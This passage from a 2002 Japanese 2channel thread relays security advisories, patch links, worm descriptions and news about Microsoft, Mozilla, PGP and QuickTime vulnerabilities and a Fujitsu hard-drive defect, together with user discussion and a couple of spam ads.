下位証明書を証明していると見せかけられる可能性があります。

(続く)
483むむむ ◆MUMUMU4w :02/09/06 00:09 ID:phlEuKkC
>>482 (続き)

対象となる製品
==============
・Microsoft Windows 98
・Microsoft Windows 98 Second Edition
・Microsoft Windows Millennium Edition
・Microsoft Windows NT 4.0
・Microsoft Windows NT 4.0 Terminal Server Edition
・Microsoft Windows 2000
・Microsoft Windows XP
・Microsoft Office for Macintosh
・Microsoft Internet Explorer for Macintosh
・Microsoft Outlook Express for Macintosh

修正プログラム
==============
・Microsoft Windows NT 4.0
・PC/AT 互換機
http://download.microsoft.com/download/winntsp/Patch/Q328145/NT4/JA/JPNQ328145i.EXE
 ・NEC PC-9800シリーズ
http://download.microsoft.com/download/winntsp/PatchNEC/Q328145/NT4/JA/JPNQ328145n.EXE
・Microsoft Windows NT 4.0 Terminal Server Edition
http://download.microsoft.com/download/winntterminal/Patch/Q328145/NT4/JA/JPNQ328145i.EXE
・Microsoft Windows XP
http://download.microsoft.com/download/whistler/Patch/Q328145/WXP/JA/Q328145_WXP_SP2_x86_JPN.exe

(続く)
484むむむ ◆MUMUMU4w :02/09/06 00:10 ID:phlEuKkC
>>483 (続き)

以下の製品に関する修正プログラムは現在準備中です。公開され次第、
このページでご案内します。

・Microsoft Windows 98/98 Second Edition
・Microsoft Windows Millennium Edition
・Microsoft Windows 2000
・Microsoft Office v.X for Mac
・Microsoft Office 2001 for Mac
・Microsoft Office 98 for the Macintosh
・Microsoft Internet Explorer for Mac (for OS 8.1 to 9.x)
・Microsoft Internet Explorer for Mac (for OS X)
・Microsoft Outlook Express 5.0.5 for Mac

(以上)
485むむむ ◆MUMUMU4w :02/09/06 00:12 ID:phlEuKkC
>>484
ということで「危険度大」のセキュリティホールの模様。
現時点では NT4.0 と XP のパッチのみが公開。その他はまだ準備中。

なお、MS Office for Macintosh, IE for Macintosh, Outlook Express for Macintosh も
同様のセキュリティホールを持つとのこと(こちらも、パッチは準備中)。
486むむむ ◆MUMUMU4w :02/09/06 01:39 ID:phlEuKkC
>>480-485
Internet Watch の記事より。

◆Microsoft、WindowsとMac用アプリで個人情報が盗まれる恐れ
http://www.watch.impress.co.jp/broadband/news/2002/09/05/ms.htm
Microsoftは、各Windowsと、Macintosh用のアプリケーションソフトにおいて、
証明書の有効範囲が適切にチェックされない問題により、悪意のあるWebサイトに
アクセスした際に個人情報が盗まれたりする恐れがあると発表した。
487むむむ ◆MUMUMU4w :02/09/06 01:52 ID:phlEuKkC
■JustSystemのメーラ、Shuriken Pro2などに任意コマンド実行、添付ファイル強制起動の
 セキュリティホール

情報元: http://memo.st.ryukoku.ac.jp/archive/200209.month/4768.html

相変わらず高木さんは辛辣かつきちんと問題を指摘している、、、。
488むむむ ◆MUMUMU4w :02/09/06 02:10 ID:phlEuKkC
>>486
日経 IT Pro の記事。こっちの方が、よりきちんと説明されています。

◆Windows OSなどになりすましを許すホールが発覚,危険度は「高」

 マイクロソフトは9月5日,なりすましを許すセキュリティ・ホールがすべてのWin
dows OSにあることを明らかにした。偽造されたデジタル証明書を適切にチェックで
きないため,S/MIMEを使った偽の署名メールを受信したり,SSLを使用する偽のWebサ
イトへアクセスしたりした場合でも,Windows上のアプリケーションは警告を出さな
い。IE for Mac,Office for Mac,Outlook Express for Mac にも同様のセキュリテ
ィ・ホールがある。最大深刻度は「高」。対策はパッチを適用することである。

引用元: http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20020905/2/
489名無しさん@お腹いっぱい。:02/09/06 02:56 ID:???
>むむむさん
最近、ニュー+の出番が少ないと思ったら、
こっちで精出してたんですね。
490むむむ ◆MUMUMU4w :02/09/06 11:31 ID:???
>>489
どうも。単に出張中だったためです、、、。

N+の場合、
・全部のスレに目を通す(既出を避けるため)
・ネタをチェックする
・依頼スレをチェックする
・ネタの関連リンクや情報を吟味する
・既出を3つぐらいの別キーワードで検索してチェックする

とかいう感じで手間がかかるので、さすがに出張中は少しスレ立て数が減りますね。

その点こっちは、既出とか心配しなくていいですし、
情報は「とりあえず」出せばいいので。
491むむむ ◆MUMUMU4w :02/09/06 11:52 ID:5IQSBABW
■PGP Corporate Desktop 7.1.1 にバッファーオーバーフローの脆弱性、
 リモートから任意のコマンドを実行可能

情報元: http://archives.neohapsis.com/archives/vulnwatch/2002-q3/0106.html
製造元のHotfix: http://www.nai.com/naicommon/download/upgrade/patches/patch-pgphotfix.asp

>>389 のものとは別物の模様。
492よーわからんが:02/09/06 18:38 ID:Q0kq6nde
Q328145ぶち込んだらなーんかいろんなデジタル証明が無効になりますた・・・・・

これかなり深刻だと思いまつでつ
493むむむ ◆MUMUMU4w :02/09/06 20:15 ID:5IQSBABW
■Windows 2000サーバに対する攻撃が頻発している件について、米Microsoftが
 調査結果を報告

Windows 2000サーバを狙った一連の“謎”のハッキングに、Microsoftが困惑している。
ワームによるものではないと同社は判断したようだが、詳細は不明

 Windows 2000サーバに対する攻撃が頻発している件について、米Microsoftが
調査結果を報告した。同社の調査チームは、この事件に困惑している。

 同社は8月30日に発行したアドバイザリで、最近複数の企業から「ハッキング活動が
増加している」という報告があったとして顧客に警告。同社のプロダクトサポートサービス
部門(PSS)は、システム管理者に対し、トロイの木馬(正当なプログラムを装った悪質
コード)や、ネットワークの特定の奇妙な動作に気を付けるよう呼びかけた。
(以上、2002年9月6日のZDNet JAPANより一部引用―全文は引用元を参照)

引用元: http://www.zdnet.co.jp/news/0209/06/ne00_attack.html
494むむむ ◆MUMUMU4w :02/09/06 20:16 ID:5IQSBABW
■オサマ・ビンラディン氏のメッセージを送信するNedalウイルス(2002.9.6)

◆概要:
 Nedalは新しく発見されたVisual Basicウイルスで、テロリズムとオサマビンラデン氏に
関するメッセージを送信する。Nedalのサイズは40,960バイトで、通常、電子メール、ネット
ワーク、リムーバブルメディア、インターネットリレーチャット、その他のファイル共有媒体
を介して他のコンピューターに拡散する。

 Nedalを実行するとWindowsディレクトリーにある.exeファイルに感染しようと試みる。
次に、.wtc拡張子の付いたファイルを作成して実行する。その後Win.iniが作成されるが、
このファイルには次のようなテキストが含まれている。
(以下略)
(以上、2002年9月6日のNetSecurityより一部引用―全文は引用元を参照)

引用元: https://www.netsecurity.ne.jp/article/2/6558.html
495名無しさん@お腹いっぱい。:02/09/06 21:48 ID:eql5xrKP
>>485
> >>484
> ということで「危険度大」のセキュリティホールの模様。
> 現時点では NT4.0 と XP のパッチのみが公開。その他はまだ準備中。
Win2k以外は出ました。
496むむむ ◆MUMUMU4w :02/09/07 00:08 ID:YAL4xK/k
>>495
以下、http://www.microsoft.com/japan/technet/security/bulletin/ms02-050.asp より。

-- 引用開始
修正プログラム :
この問題に対する日本語版修正プログラムは、次のサイトからダウンロードできます。

Microsoft Windows 98
http://www.microsoft.com/windows98/downloads/contents/WUCritical/q328145/default.asp
Windows 98 Second Edition
http://www.microsoft.com/windows98/downloads/contents/WUCritical/q328145/default.asp
Windows Me
http://download.microsoft.com/download/winme/Patch/25386/WinMe/JA/328145JPNM.EXE
Windows NT 4.0:
PC/AT 互換機用
http://www.microsoft.com/downloads/release.asp?ReleaseID=42522
NEC PC-9800 シリーズ用
http://www.microsoft.com/downloads/release.asp?ReleaseID=42523
Windows NT 4.0 Terminal Server Edition:
PC/AT 互換機用
http://www.microsoft.com/downloads/release.asp?ReleaseID=42552
Windows XP:
http://www.microsoft.com/downloads/release.asp?ReleaseID=42568

注意 : Windows 98/98 Secound Edition の環境では、Internet Explorer 5.01 以上が必要になります。
以下の製品に関する修正プログラムは現在準備中です。公開され次第、このページでご案内します。
Windows 2000, Windows XP 64 bit Edition, Microsoft Office v.X for Mac
Microsoft Office 2001 for Mac, Microsoft Office 98 for Macintosh Edition
Microsoft Internet Explorer for Mac (for OS 8.1 to 9.x)
Microsoft Internet Explorer for Mac (for OS X)
Microsoft Outlook Express for Mac
-- 引用終了
497名無しさん@お腹いっぱい。:02/09/07 01:25 ID:???
なんで、Windows 2000のはまだ出ないんでしょうね?
498名無しさん@お腹いっぱい。:02/09/07 02:51 ID:???
>>497
SP3が出たばっかりだからじゃないでしょうか?
499名無しさん@お腹いっぱい。:02/09/07 03:33 ID:nHL+8tps
デジタル証明書のやつ、XPHomeで何回WUdにアクセスしても
「重要な更新なし」ってなるよヽ(`Д´)ノウワァァァァァァン!!
だいじょぶなん?
500499:02/09/07 03:48 ID:DrKIMXsx
しょーがないんで>>496のリンク先で手動でダウソしますた。
WUdにはまだ登録されてないの?

501名無しさん@お腹いっぱい。:02/09/07 03:52 ID:???
いつもの事だが、>>496にOperaでアクセスしたらまともに表示されない。
502名無しさん@お腹いっぱい。:02/09/07 03:54 ID:DrKIMXsx
ID(・∀・)イイ!
503名無しさん@お腹いっぱい。:02/09/07 06:55 ID:???
>>501
OperaのCSSやJavaScript、DOMの実装がおかしいだけ。
504名無しさん@お腹いっぱい。:02/09/07 12:48 ID:???
>>503
ちがう
src属性があるのに中身が空っぽの変な記述をしているのが問題

<SCRIPT LANGUAGE="javascript" SRC=""></SCRIPT>
505501:02/09/08 01:31 ID:???
>>503-504
どっちなのかは分からんが、取り敢えず、JavaScript を切っていた時点で
失格だったのは分かった。有り難う。
506むむむ ◆MUMUMU4w :02/09/08 22:28 ID:Jy59bb6j
Windows XP Service Pack 1 Coming Soon
http://www.microsoft.com/japan/windowsxp/pro/downloads/servicepacks/sp1/default.asp
ページができた模様(まだものはない)。
507むむむ ◆MUMUMU4w :02/09/09 15:19 ID:4ahFhKJe
>>491
日本語の記事がようやく出た。

「かなり優秀な」はずの『PGP』に脆弱性
http://japan.internet.com/webtech/20020909/11.html
508むむむ ◆MUMUMU4w :02/09/09 15:32 ID:4ahFhKJe
509名無しさん@お腹いっぱい。:02/09/09 15:57 ID:???
>>508
出張、大丈夫ですか?
510むむむ ◆MUMUMU4w :02/09/09 17:45 ID:???
>>509
現地のネットワークがきびしいので、N+での記者活動はできないかも。
ここに書くぐらいは何とか。
511むむむ ◆MUMUMU4w :02/09/09 23:03 ID:4ahFhKJe
■Cドライブを初期化するワーム「ハンチ」で警告 シマンテック

 アンチ・ウイルスソフトのシマンテックはこのほど、大量メール送信ワーム「ハンチ」の
亜種、「W32.Hunch.H@mm」と「W32.Hunch.I@mm」について警告を出した。感染報告例は
ほとんどないが、Cドライブをフォーマットしようとするため「ダメージが大きくウイルス
ソフトを利用していない場合は危険」としている。

 同ウイルスは、ともに9月5日 (米国時間)に発見された。いずれも、添付ファイルを
開封すると感染し、Outlookのアドレス帳に登録されている全メールアドレス宛に自分
自身を送信する。また、無作為に選び出した拡張子のファイルを削除する。影響を受ける
システムはWindows95、98、NT、2000、XP、Meだが、95、98、Meでは次回起動時に
ハードドライブが再フォーマットされてしまう。

 メール件名はランダムで、添付ファイル名も変化する。
(以上、2002年9月9日の毎日インタラクティブより一部引用―全文は引用元を参照)

引用元: http://www.mainichi.co.jp/digital/network/archive/200209/09/7.html
512名無しさん@お腹いっぱい。:02/09/10 02:38 ID:xsWwDseB
突然すみません。
当方、ヤフーBBなんですけど、
自スレで友達とマターリと話してたら、なんかまったく同じIPの騙りが出てきたんですけど、
こんなことって出来るの??
変なこと騙られないか心配で寝れません。
YBBにメルしたほうがいいのでしょうか?
513名無しさん@お腹いっぱい。:02/09/10 02:57 ID:???
>>512
IP が一致するのは非常に低い確率だけどあり得る。運が悪いね。
YBB にメールしても何にもならないよ。回線切って寝たほうが早い。
514むむむ ◆MUMUMU4w :02/09/10 13:52 ID:GW9aAo7O
▼MicrosoftがIE 6 Service Pack 1を準備中
http://itpro.nikkeibp.co.jp/free/NT/NEWS/20020909/1/

# 英語版の WinXP SP1 が配布開始のようですね。
515☆☆あっ激写シリーズ☆☆:02/09/10 13:53 ID:ilg1XtW9
祝★★ヒッキーと紀里谷のプライベートキス写真★★
http://www.all-mode.net/jrank/in.php?id=arifish
★★やっぱりな叶姉妹と窪塚密会パコパコ写真★★
http://pakopako.misty.ne.jp/enter.cgi?id=arifish
あゆの整形手術時の顔まる見え写真
http://210.153.105.166/cgi-bin/rank/ranklink.cgi?id=fish
ソニンの超エッチなアングルのブルマ写真
http://friends.rank.ne.jp/in.cgi?account=arifish
ポルノグラフティと保田圭自宅前で激写!!
http://kindan.adult-deai.net/kinrank/ranklink.cgi?id=arifish
★★坂口憲二と長谷川京子のキス写真★★
http://ninkirank.misty.ne.jp/06/enter.cgi?id=arifish
516名無しさん@お腹いっぱい。:02/09/10 14:11 ID:???
>>515の広告がウザい人は。

▲▼風俗サイト広告逝ってよしっ!第3回戦▼▲
http://live.2ch.net/test/read.cgi/festival/1029826982/-50

に報告しにいってよし!
517名無しさん@お腹いっぱい。:02/09/10 14:12 ID:rpT0wdCZ
広告はあぼ〜んして。

広告がウザいのには同意だが
いた違いの雑談はできるだけやめてほしい。

いつもお疲れ。
518むむむ ◆MUMUMU4w :02/09/10 16:16 ID:GW9aAo7O
■IE に新たな脆弱性、イスラエル企業が警告(2002/9/10)

イスラエルのセキュリティ会社 GreyMagic Software は9日、Microsoft (NASDAQ:
MSFT) の Web ブラウザ『Internet Explorer (IE)』に新たな脆弱性が見つかったと
発表した。Web サイトのフレームを通じて攻撃者にパソコンを改竄 (かいざん) され
かねない脆弱性だという。

この脆弱性は、『IE 5.5』以降の全バージョン、および IE のエンジンを使っている
アプリケーション ──『Outlook』や『MSN Explorer』など ── の全てに存在する。

この脆弱性を突けば、IE が設定したプロトコルやドメイン制限を一切無視して、
フレームやインラインフレームのエレメントを含んだ任意の Web ページでスクリプトを
実行できる。

スクリプトを実行すれば、任意のサイトのクッキーを盗んだり、ページ上のコンテンツ
を改竄したりできる。そして多くの場合、ローカルファイルを読んだり、クライアントの
マシンで任意のプログラムを実行したりすることも可能だという。
(中略)
Microsoft はまだ修正パッチを公開していないため、GreyMagic はユーザーに対し
Active Scripting を無効にするよう呼びかけている。それを無効にすれば、問題の
脆弱性を突かれることはない。
(以上、2002年9月10日のjapan.internet.comより一部引用―全文は引用元を参照)

引用元: http://japan.internet.com/webtech/20020910/10.html
GrayMagicの情報&デモ: http://sec.greymagic.com/adv/gm010-ie/
519通行人:02/09/10 17:41 ID:???
>>512
当方ヤフーでないので、今の状態分からないけど
私の場合 ケーブルで、そこのプロキシーサーバーを設定して
利用してここに来るので、たまに同じIDの人に遭遇する
(当然同じ プロキシー使って 繋げたら IDは同じに
なります) 
*ID同じのを見つけると、なんか驚かしたくなるのかと
思って あんまし気にしてませんが、、、、
520むむむ ◆MUMUMU4w :02/09/10 21:21 ID:LfrEsPfB
>>514
出た模様。
「Internet Explorer 6 SP1」英語版リリース〜セキュリティー問題を修正
http://www.watch.impress.co.jp/internet/www/article/2002/0910/ie6sp1.htm
521むむむ ◆MUMUMU4w :02/09/10 21:56 ID:GW9aAo7O
■IEのJava環境に10種類以上のセキュリティホール、IE6 SP1では未対応

 Microsoftの「Internet Explorer(IE)」に付随するMicrosoft製のJava環境に複数の
深刻なセキュリティーホールが発見された。このセキュリティーホールを発見した
のはフィンランドのOnline Solutions社で、Microsoftはこの問題を認め、現在パッチを
準備している最中だという。9日にMicrosoftより発表された「Internet Explorer 6 SP1」
では、未対応の問題である。

 このセキュリティーホールが悪用されると、IEでWebページを開いた場合、あるいは
Outlookでメールを通してWebサイトで閲覧した場合に、そのページに含まれる悪意の
Javaアプレットを通して任意のプログラムが実行される可能性がある。Outlookと
Outlook Expressの場合、最新のパッチを当てていればセキュリティーゾーンが最高に
設定されているためJavaアプレットは実行されない。

 今回Online Solutionsは、10種類以上のJavaにまつわるセキュリティーホールを
発見し、そのすべてをMicrosoftに対して報告した。その中にはユーザーのシステムの
ファイルを閲覧できるようにするもの、リソースにアクセスできるもの、任意のプログラム
を送り込んで実行させるものなどがあった。こうしたセキュリティーホールは悪用する
ことにより、ファイルを改変したり危険なプログラムをインストールし実行すること、
プログラムの削除などができてしまうという。
(以上、2002年9月10日のInternet Watchより一部引用―全文は引用元を参照)

引用元: http://www.watch.impress.co.jp/internet/www/article/2002/0910/mjvm.htm

どうやら>>518と別みたいなので、本日だけで2本目のセキュリティホール報告。
522むむむ ◆MUMUMU4w :02/09/10 21:58 ID:???
>>521
IEのというか、IEに限らないので「MSの」ですね。スマソ。
523むむむ ◆MUMUMU4w :02/09/10 22:03 ID:???
>>521-522
引用元によると、問題は MS が「独自拡張」した部分のため、
Sun のJava VM (Java plug-in)を使えば問題ない模様。
524むむむ ◆MUMUMU4w :02/09/11 13:18 ID:cPxjJyb8
■Apple QuickTime ActiveX v5.0.2 にバッファオーバーフローの脆弱性(2002/9/10)

解決方法は、QuickTime 6への更新とのこと。

情報元: http://www.atstake.com/research/advisories/2002/a091002-1.txt
525IEかぁ:02/09/11 14:29 ID:???
IEのセキュリティーホールが見つかる(よくあること)のは怖いけど
対策とってるから少しはまし
Opera使うことあるけど正しく表示されないこと多々
とりあえずMicrosoftのHPいってアップデートしとけば安心。たぶん
526ぼるじょあ ◆EncckFOU :02/09/11 14:41 ID:???
>>480-484
証明書確認の問題により、ID が偽装される (Q328145) (MS02-050)の
Windows 2000の修正プログラムがやっと公開されました。

PC/AT 互換機用
http://download.microsoft.com/download/win2000platform/patch/q328145/nt5/ja/Q328145_W2K_SP4_X86_JA.exe

NEC PC-9800 シリーズ用
http://download.microsoft.com/download/win2000platform/patch/q328145/nt5/ja/Q328145_W2K_SP4_X86_JA.exe

==================
この修正プログラムがマシンにインストールされたことを
確認するためには、マシンに次のレジストリ キーが作成されたことを
確認して下さい。

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Updates\Windows 2000\SP4\Q328145.

各ファイルを確認するためには、次のレジストリ キーで、
日付、時間そしてバージョン情報を参照して下さい。

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Updates
\Windows 2000\SP4\Q328145\Filelist
527名無しさん@お腹いっぱい。:02/09/11 18:37 ID:SK4owMaj
528むむむ ◆MUMUMU4w :02/09/11 20:23 ID:f6IoYR5j
■長さが0のGIFファイルの取り扱いのバグを利用した Exploit コードが公開
  Netscape, Mozilla, Opera 等、多くのブラウザに影響(SecuriTeam)

情報元: http://www.securiteam.com/exploits/5YP012A8AW.html
529むむむ ◆MUMUMU4w :02/09/12 22:30 ID:BqPwcTxb
■WORM_CHET.A (チェット)〜9.11同時多発テロに便乗したウイルス〜

米国同時多発テロから1年が経った2002年9月11日、テロに便乗したウイルスが
発見されました。

WORM_CHET.A(チェット)は、メールの添付ファイルで広まるウイルスで、メー
ルにはテロの内容が記述されています。内容は下記の通りです。

送信者: [email protected]
タイトル: All people!!
添付ファイル名: 11september.exe (exeの後ろにスペースが入ってます)
本文:Message Body: Dear ladies and gentlemen! で始まる英文で、テロに
関する内容が記されています。

添付ファイルを実行すると感染し、上記内容のウイルス付きメールを任意の宛
先に送信します。ただし、ウイルスコードの中にいくつかのバグがあるため、
メール送信が行われない場合もあります。

現在のところ実際の感染報告はなく危険度は低いものですが、今後も同様に大
きな社会的現象に便乗したウイルスが出現するおそれがありますのでご注意く
ださい。

トレンドマイクロ製品ではパターンファイル347以降で本ウイルスに対応して
います。

○ WORM_CHET.A 詳細情報:
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_CHET.A
530bloom:02/09/12 22:32 ID:uKsnkdkr
531むむむ ◆MUMUMU4w :02/09/12 22:54 ID:BqPwcTxb
>>524
日本語ソース出ました。

『QuickTime 5』の ActiveX に脆弱性
http://japan.internet.com/webtech/20020912/12.html
532名無しさん@お腹いっぱい。:02/09/12 23:18 ID:???
※※※ 注意!!! 富士通製HDDは危険な可能性があります ※※※

現在、富士通製HDD MPG3409シリーズのクラッシュが異常な頻度で発生しているとの情報があります。
この件に関して富士通側からの公式コメントはありません。

以下はあくまで『経験にもとづく』『ネット上での』情報です
・HDD裏面の制御チップがCIRRUS LOGIC製で稼動中に異常発熱する
・型番はCL-SH8671-450E-A4など、型番の末尾が、A[n]で、nが6以下のものが危険性が高い模様。
 それに加えて、製造年月が、2001-3以前のものなら、ほぼ確実に該当ロット。
・富士通は、HDDを単体で購入したユーザーに対して対応するつもりは全く無い模様
[具体例]
MADE IN THAILAND
MODEL MPG3409AT-EF
DATE 2001-5

チップ
CIRRUS LOGIC
CL-SH8671-450E-A4
F010851-1219AH
0109 l
KOREA-F

富士通製PCだけでなく、日立・IBM・NEC・コンパック等のメーカー製PCにも使用されています
事実を知らず、つい格安HDDとして購入された方もいらっしゃるようです。
詳細は自作PC@2ch掲示板 ttp://pc3.2ch.net/jisaku/ の関連スレへ。

 現状ではクラッシュ後のデータ復活は まず不可能です

 大 至 急 デ ー タ の バ ッ ク ア ッ プ を し て く だ さ い
533むむむ ◆MUMUMU4w :02/09/13 00:27 ID:2plB1sLs
>>532
一応情報です。まあ、データ保全もセキュリティの一種ということで。

Computing ◆……………………………………………………………………………………
     NECとIBMのパソコンでもHDDに不具合の可能性
……………………………………………………………………………………………………◆
 NECと日本IBMはこのほど、両社が製造したパソコンのHDDに不具合が発生する
可能性があることを明らかにした。7月に富士通のパソコンで見つかった不具合
と同じ現象で、該当機種の利用者には状況に応じて、無料修理などで対応する。
▽詳細
http://www.mainichi.co.jp/digital/computing/archive/200209/11/4.html
534名無しさん@お腹いっぱい。:02/09/13 13:00 ID:???
※※※ 注意!!! 富士通製HDDは糞ヽ(`Д´;)ノ ※※※
http://www.nhk.or.jp/news/2002/09/13/k20020913000034.html#
http://headlines.yahoo.co.jp/hl?a=20020913-00000404-yom-bus_all
現在、富士通製HDD MPG3409シリーズのクラッシュが『2〜3%』どころじゃない異常な頻度で発生しているとの情報があります。
この件に関して富士通側からの公式謝罪はありません(1年以上前から分かってたのに。) 企業体質を疑うね。
以下はあくまで『経験にもとづく』『ネット上での』情報+αです
・HDD裏面の制御チップがCIRRUS LOGIC製で稼動中に異常発熱するので、HDD自体のせいで「高音多湿」に(藁
・型番はCL-SH8671-450E-A4など、型番の末尾が、A[n]で、nが6以下のものが危険性が高い模様。
 それに加えて、製造年月が、2001-3以前のものなら、ほぼ確実に該当ロット。
・富士通はバルクユーザーに対して対応するつもりは全く無い模様
[具体例]
MADE IN THAILAND
MODEL MPG3409AT-EF
DATE 2001-5

チップ
CIRRUS LOGIC
CL-SH8671-450E-A4
F010851-1219AH
0109 l
KOREA-F

富士通製PCだけでなく、日立・IBM・NEC・コンパック等のメーカー製PCにも使用されています
事実を知らず、つい格安HDDとして購入された方もいらっしゃるようです。つーか、秋葉でまだ売ってるよ……
詳細は自作PC@2ch掲示板 ttp://pc3.2ch.net/jisaku/ の関連スレへ。

 現状ではクラッシュ後のデータ復活は まず不可能です。まぁ今後の腐士通の熱意次第ですけど。

 大 至 急 デ ー タ の バ ッ ク ア ッ プ を し て く だ さ い
535名無しさん@お腹いっぱい。:02/09/13 13:08 ID:???
>>534
自作派で富士通なんか買ってる奴の方が悪い
バルクが対応されないおは当然だと思うが?
536名無しさん@お腹いっぱい。:02/09/13 15:12 ID:???
>>535
不良品と知ってて売り続ける店も店だわ。
ジャンク品売り場にあるなら疑いもするけどな。
537名無しさん@お腹いっぱい。:02/09/13 15:21 ID:???
>>535
基本的にHDDは組込みされてる物以外はバルクですが何か?(外付け除く)
538名無しさん@お腹いっぱい。:02/09/13 16:47 ID:???
すっげー前から言われてたことなのに、どうして組む前に調べないかね?
バルクに救済措置が取られると考えるのもどうかしてるし。
539_:02/09/13 23:02 ID:???
おまけにセキュリティ違いという話も・・
540名無しさん@お腹いっぱい。:02/09/14 01:34 ID:YseC7hUO
unnko
541むむむ ◆MUMUMU4w :02/09/14 14:32 ID:JhY1OfEn
542名無しさん@お腹いっぱい。:02/09/14 14:59 ID:???
>>541
落とそうとしている最中だが。

130Mbyte!?
543542:02/09/14 15:41 ID:???
インスト完了。
システムのプロパティに

  Service Pack 1

の文字が。
544542:02/09/14 15:54 ID:???
ちなみに、インストールフォルダに 280Mbyte 程、アンインストール用の
バックアップフォルダに 250Mbyte 程の空き容量が必要。
545名無しさん@お腹いっぱい。:02/09/14 15:55 ID:q/SWSswP
56kbpsで落とせるかゴルァ!

いいもん、CD買うから。
…CATVがくるまで待ちか。。。
546542:02/09/14 16:01 ID:???
度々書き込んですまないが、誰か、SP1 入れる直前と入れた直後で
ad-aware(スパイウェア発見ソフト)実行して結果を比べてくれないか?

こちらで実行してみたら 20 とか見つかって ??? 状態。SP1 との
因果関係があるのかないのか知りたい。

 スパイウェア発見専用ソフト「Ad-aware」 Part3
 http://pc.2ch.net/test/read.cgi/sec/1027059662/
547名無しさん@お腹いっぱい。:02/09/14 16:27 ID:+0ITbZzE
おお、とうとう来ましたか。これってプラス板に立ててもいいんではないかなんて
思うんですがどうなんだろ。
548むむむ ◆MUMUMU4w :02/09/14 16:45 ID:JhY1OfEn
>>546
SP1インストール後にAd-aware 5.83+Refupdate 2.01でスキャンしましたが、
いつも出る2つ(Other と Doubleclick)以外は特に出なかったです。

>>547
ふむ、どうしましょうか。
549むむむ ◆MUMUMU4w :02/09/14 17:28 ID:JhY1OfEn
今頃知った、、、。これって仕様だと思ってたけど、バグだったのね。
SP1にこのパッチは含まれている模様。セキュリティ情報じゃなくて失礼。

■Windows XP 修正プログラム : SMB を使用してファイルを開く時に時間がかかる

この修正プログラムでは、SMB プロトコルを使用しているネットワーク共有を経由して
ファイルを開こうとすると、ファイルが開くまでに長時間かかってしまう問題が修正され
ます。この問題は、Windows XP クライアントが既にファイルを開いており、そのファイルに
対する oplock (opportunistic file locking) を保持している場合に発生することがあります。

詳細 - http://www.microsoft.com/japan/support/kb/articles/JP309/3/76.asp
バージョン - Q309376
リリース日 - 29 May 2002
推定ダウンロード サイズ/時間 @28.8 - 285 kb / 2分
550542:02/09/14 21:04 ID:???
>>548
アリガト。勘違いか。
551名無しさん@お腹いっぱい。:02/09/15 09:33 ID:PdnUiZTU
なんかM$のあぷでーとから落としても
インスコに失敗しますた
になるよー、ウワァァァァン。

XP-56kbps。

あと自動更新でダウソしても現在の状況とか見れないの?
552むむむ ◆MUMUMU4w :02/09/17 12:28 ID:LMInmwgR
■MS Wordに文書のハイジャックを許す問題点

 米Microsoftは9月12日、同社のワープロソフト「Word」に、外部からのファイルの
盗み取りを許す問題点があると明らかにした。

 ただしこの手法を悪用する攻撃者は、対象ファイルの所在と名称を正確につかんで
いる必要があり、また被害者にWord文書をオープン/修正/セーブさせ、送信者に
返送させなければならない。
(中略)
 攻撃者はWord文書に組み込まれている数々の隠しフィールドの1つである
「INCLUDETEXT」を利用することにより、別のコンピュータ上でオープンされた文書に
テキストをコピーすることができる。小さな書体を使い、文字色を白にすることで、
この追加テキストはほとんど目視不可能になり、ファイルを隠すことができる。

 この問題点はBugtraqメーリングリストで8月26日に最初に報告された。Woody's
Office Watchの編集者でWindows利用者のための書籍をいくつか著しているWoody
Leonhard氏が、自身のメールニュースレターでこの問題を取り上げている。

 Microsoftは現在調査を進めているが、修正プログラムのリリーススケジュールは
示しておらず、現状では、ファイルが盗まれるのを防ぐためには、手作業でフィールドを
チェックする必要がある。
(以上、2002年9月17日のZDNet JAPANより一部引用―全文は引用元を参照)

引用元: http://www.zdnet.co.jp/news/0209/14/nebt_08.html
553むむむ ◆MUMUMU4w :02/09/17 12:39 ID:LMInmwgR
>>552
japan.internet.comの同記事。Word 97も修正されるのかという見地に立った内容。
http://japan.internet.com/webtech/20020917/12.html
554名無しさん@お腹いっぱい。:02/09/17 13:31 ID:FvE7NdUz
リフォームのことならリフォムちゃんにおまかせ!!
リフォームの疑問になんでも答えてくれます!

http://www.homepro.co.jp/palette/refom/
555むむむ ◆MUMUMU4w :02/09/17 16:11 ID:LMInmwgR
■Mozilla にプライバシー情報を露呈する脆弱性

Mozilla ベースのブラウザを使うと、ユーザーの Web サーフィン活動が漏えいする
可能性があることが、研究者の報告で明らかになった。

Neopoly の主任研究員 Sven Neuhaus 氏によると、このバグは5月に初めて発見
されたもので、深刻なプライバシー問題を引き起こすという。

Neuhaus 氏の報告によると、Mozilla ベースのブラウザのユーザーが、『JavaScript』
の『onunload』あるいは『unload』ハンドラを悪用する Web サイトを訪問すると、その
直後あるいは一定時間後に訪問する URL をそのサイトに知られてしまうという。
このため、ユーザーは移動先の URL を手動で打ち込んだにしろ、ブックマークで
指定したにしろ、Web サイト側から追跡されてしまうことになる。

Neuhaus 氏は、Mozilla の各リリースの脆弱性情報を追跡するサイト Bugzilla で
「このバグは Mozilla 1.1 リリースに依然として含まれている……すでに3カ月もの間
放置されている」と述べて修正の必要性を訴えた。

脆弱性が存在するのは、Mozilla 0.9x、1.0、1.0.1、1.1および1.2 alpha 版、
Netscape 6.x および7、ならびに Galeon 1.2.x および Chimera 0.5となっている。

Mozilla のユーザーには、修正プログラムの準備が整うまでの応急措置として、
JavaScript を無効にするよう勧告が出ている。
(以上、2002年9月17日のjapan.internet.comより一部引用―全文は引用元を参照)

引用元: http://japan.internet.com/webtech/20020917/11.html
556むむむ ◆MUMUMU4w :02/09/17 16:13 ID:LMInmwgR
>>555
本文中にもあるように、これは

>脆弱性が存在するのは、Mozilla 0.9x、1.0、1.0.1、1.1および1.2 alpha 版、
>Netscape 6.x および7、ならびに Galeon 1.2.x および Chimera 0.5となっている

ということで、MozillaだけではなくMozillaベースのブラウザに広範囲に影響する模様。
557むむむ ◆MUMUMU4w :02/09/17 18:13 ID:LMInmwgR
>>475
ポリコムのセキュリティホール、日本語ソースがようやく出ました。

2 ■ポリコム社のテレビ会議システムにセキュリティーホール ■
< http://www.hotwired.co.jp/news/news/20020917302.html >
米ポリコム社のテレビ会議システム『ビューステーション』
(ViewStation)にセキュリティーホールが存在することが発覚した。
外部からシステムをコントロールし、企業の社内テレビ会議をイン
ターネット上で放映することも可能だという。同社は先週、修正
を施したアップグレード版をリリースしているが、ユーザーへの
